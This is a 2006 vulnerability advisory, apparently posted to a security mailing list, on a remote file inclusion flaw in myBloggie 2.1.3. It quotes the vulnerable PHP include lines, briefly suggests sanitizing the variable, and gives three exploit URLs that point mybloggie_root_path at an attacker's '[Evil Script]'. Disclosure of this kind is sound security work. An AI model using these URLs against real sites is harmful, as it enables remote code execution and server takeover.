myBloggie <= 2.1.3 (mybloggie_root_path) Remote File Inclusion Vulnerability

Thu, 10 Aug 2006 21:33:33 -0700 

-----------------------------------------------------------------------------------------

myBloggie 2.1.3 mybloggie_root_path Remote File Inclusion

-----------------------------------------------------------------------------------------

Author   : Sh3ll

Date     : 2006/04/29

Location : Iran - Tehran

HomePage : http://www.sh3ll.ir

Email    : sh3ll[at]sh3ll[dot]ir

Critical Level : Dangerous

-----------------------------------------------------------------------------------------

Affected Software Description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

Application : myBloggie

version     : 2.1.3

URL         : http://www.mywebland.com , http://mybloggie.mywebland.com

Description : 

myBloggie is considered one of the most simple, user-friendliest yet packed

with features Weblog system available to date.

-----------------------------------------------------------------------------------------

Vulnerabilities:

~~~~~~~~~~~~~~~

in admin.php , index.php & db.php We Found Vulnerability Scripts

----------------------------------------admin.php----------------------------------------

....

<?php

        include($mybloggie_root_path.'spacer6.php');

        ?>

...

----------------------------------------index.php----------------------------------------

....

<?php

}

if (!isset($mode)) {

    include($mybloggie_root_path.'blog.php');

}

$template->pparse('sidevert');

}


// End right sidemenu condition


// Sidemenu menu items. You can change the menu item order here

include($mybloggie_root_path.'calendar.php');

include($mybloggie_root_path.'spacer.php');

include($mybloggie_root_path.'category.php');

include($mybloggie_root_path.'spacer.php');

include($mybloggie_root_path.'recent.php');

include($mybloggie_root_path.'spacer.php');

include($mybloggie_root_path.'archives.php');

include($mybloggie_root_path.'spacer.php');

include($mybloggie_root_path.'user.php');

include($mybloggie_root_path.'spacer.php');

if ($search) {

include($mybloggie_root_path.'searchform.php');

include($mybloggie_root_path.'spacer.php');

}

...    


-------------------------------------------db.php----------------------------------------

....

<?php

       include($mybloggie_root_path .'includes/mysql.php');

       ?>

...

-----------------------------------------------------------------------------------------

Exploit:

~~~~~~~

http://www.target.com/[myBloggie]/admin.php?mybloggie_root_path=[Evil Script]

http://www.target.com/[myBloggie]/index.php?mybloggie_root_path=[Evil Script]

http://www.target.com/[myBloggie]/includes/db.php?mybloggie_root_path=[Evil 
Script]


Solution:

~~~~~~~~

Sanitize Variabel $mybloggie_root_path in admin.php , index.php & db.php

-----------------------------------------------------------------------------------------

Shoutz:

~~~~~~

~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena

~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams

Reply via email to